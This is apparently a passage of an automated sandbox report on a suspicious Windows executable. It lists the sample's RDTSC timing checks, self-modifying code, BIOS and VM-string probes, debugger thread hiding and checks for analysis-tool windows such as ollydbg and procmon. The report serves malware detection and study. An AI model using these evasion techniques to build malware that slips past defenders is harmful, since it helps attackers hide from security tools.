                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FB23 second address: 63FB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FF80 second address: 63FF89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FF89 second address: 63FF8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6401AE second address: 6401BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 je 00007F2398D03473h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6404B3 second address: 6404BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6408E0 second address: 6408E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6408E6 second address: 6408EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 640AA5 second address: 640AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 640AAB second address: 640AAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6411A9 second address: 6411B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2398D03456h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647603 second address: 647626 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C065h 0x00000007 jng 00007F239852C056h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647626 second address: 64762A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64762A second address: 647630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647786 second address: 64778C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657ECC second address: 657ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F239852C056h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657BAE second address: 657BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657BB2 second address: 657BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A35F second address: 65A36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2398D03456h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A36D second address: 65A375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A375 second address: 65A37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66788E second address: 66789F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jc 00007F239852C056h 0x0000000d pop ebx 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66789F second address: 6678A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66E921 second address: 66E925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66EA95 second address: 66EAAE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F2398D0345Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F01D second address: 66F02F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F239852C05Bh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F9FD second address: 66FA17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F2398D03464h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FA17 second address: 66FA28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F239852C05Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FA28 second address: 66FA2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FA2C second address: 66FA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FA35 second address: 66FA3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 672F01 second address: 672F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 672F07 second address: 672F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 672F0F second address: 672F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C05Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674EBC second address: 674EC1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674EC1 second address: 674ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674ECA second address: 674ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 682195 second address: 6821D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C067h 0x00000007 jmp 00007F239852C064h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edi 0x0000000f jc 00007F239852C064h 0x00000015 push esi 0x00000016 jbe 00007F239852C056h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68202D second address: 68204C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F2398D03468h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D8BF second address: 67D8C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D8C3 second address: 67D8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F2398D0345Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jnl 00007F2398D03456h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68EEBF second address: 68EEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68EEC4 second address: 68EEDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2398D03464h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6918CF second address: 6918D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6918D3 second address: 6918FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 jc 00007F2398D0345Ah 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 jmp 00007F2398D03463h 0x00000018 pop ecx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6918FD second address: 691905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A26F0 second address: 6A26F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A26F4 second address: 6A2717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F239852C056h 0x00000011 jmp 00007F239852C062h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A2717 second address: 6A271F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A271F second address: 6A2732 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F239852C05Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a je 00007F239852C056h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A289C second address: 6A28BA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2398D03458h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnp 00007F2398D03458h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A2B75 second address: 6A2B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A2B7F second address: 6A2B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A2FC4 second address: 6A2FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A3110 second address: 6A3131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 jmp 00007F2398D03464h 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A3131 second address: 6A3135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A3135 second address: 6A313F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2398D03456h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4EE4 second address: 6A4EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C05Bh 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4EF4 second address: 6A4F23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D03466h 0x00000007 pushad 0x00000008 jmp 00007F2398D03464h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4F23 second address: 6A4F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F239852C056h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4F36 second address: 6A4F4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D0345Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F2398D03456h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4F4E second address: 6A4F58 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F239852C056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4F58 second address: 6A4F5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A79C6 second address: 6A79CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A79CC second address: 6A79D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7DCB second address: 6A7DE2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F239852C05Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7DE2 second address: 6A7DEC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2398D03456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8F40 second address: 6A8F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F239852C05Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC710 second address: 6AC715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC715 second address: 6AC72E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jo 00007F239852C056h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC72E second address: 6AC74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2398D03468h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC74D second address: 6AC752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF031A second address: 4CF031E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF031E second address: 4CF033B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C069h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF033B second address: 4CF0359 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D03461h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov eax, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f movsx ebx, si 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF040E second address: 4CF041D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C05Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF041D second address: 4CF0486 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2398D03462h 0x00000009 sbb ecx, 61F3D9A8h 0x0000000f jmp 00007F2398D0345Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 jmp 00007F2398D03466h 0x0000001e push eax 0x0000001f pushad 0x00000020 mov eax, edx 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 jmp 00007F2398D03466h 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c mov ax, 25BDh 0x00000030 push eax 0x00000031 push edx 0x00000032 mov ah, 0Ch 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0486 second address: 4CF048A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF048A second address: 4CF0499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 pushad 0x00000009 mov ah, dl 0x0000000b push eax 0x0000000c push edx 0x0000000d mov al, FFh 0x0000000f rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 411AC2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5E6D41 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4119A2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 64E9F2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001C38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001C4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_001BDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_001BE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_001BED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_001C4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001BDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_001BBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BF68A FindFirstFileA,0_2_001BF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001BF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_001C3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001B16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B1160 GetSystemInfo,ExitProcess,0_2_001B1160
                Source: file.exe, file.exe, 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2074713980.0000000000F41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWK,
                Source: file.exe, 00000000.00000002.2074713980.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2074713980.0000000000F41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13746
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13749
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13769
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13801
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13761
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
